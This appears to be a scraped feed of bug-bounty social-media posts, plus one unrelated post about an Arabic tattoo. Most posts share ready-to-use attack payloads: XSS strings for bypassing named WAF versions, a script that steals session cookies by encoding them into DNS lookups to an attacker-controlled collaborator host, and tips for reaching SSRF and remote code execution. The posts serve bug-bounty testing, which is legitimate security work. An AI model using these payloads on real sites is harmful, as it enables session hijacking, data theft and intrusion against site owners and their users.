Z3D

I just saw an American with the tattoo “الكوابيس آخر أبدا" which confused my entire existence. I typed it on Google Translate and it translated to “nightmares never last”...

XSS waf bypass challenge... Please share your favorite xss payload for waf bypass... My favorite : ">'><details/open/ontoggle=confirm('XSS')> #bugbountytip #bugbountytips #hackingcommunity

Cookie theft over DNS while XSS, payload by @chaignc <script> document.location = "//" + btoa(document.cookie).replace(/[A-Z]/g, '$&.').replace(/=/g, 'X') + "I." + "YourBurpCollaborator"; </script> Decode: atob("Your_Receveived_DNS".replace(/(.)./g, (_,x)=>x.toUpperCase()))

I never thought of adding the X-HTTP-Method-Override: PUT header to achieve RCE. I'm surprised this isn't built into burp's scanner. https://www.sec-down.com/wordpress/?p=809 …

WAF XSS Bypasses by @brutelogic. Wordfence 7.4.2 <a href=&#01javascript:alert(1)> Sucuri CloudProxy (POST only) <a href=javascript&colon;confirm(1)> ModSecurity CRS 3.2.0 PL1 <a href="jav%0Dascript&colon;alert(1)">

SSRF Break Points [1/2] - Anything that accepts a URL - File upload option? Change type="file" to type="url" and submit a URL. - Image upload? Submit a svg containing "image" element with the payload in xlink:href attribute. Try ImageMagick exploits.

Hackers, I've built a small game that helps improve your XSS skills! It dynamically generates (increasingly more difficult) levels for you to exploit XSS vulnerabilities. No level is the same. Let me know what you think. Happy hacking! https://unescape-room.jobertabma.nl/  #TogetherWeHitHarder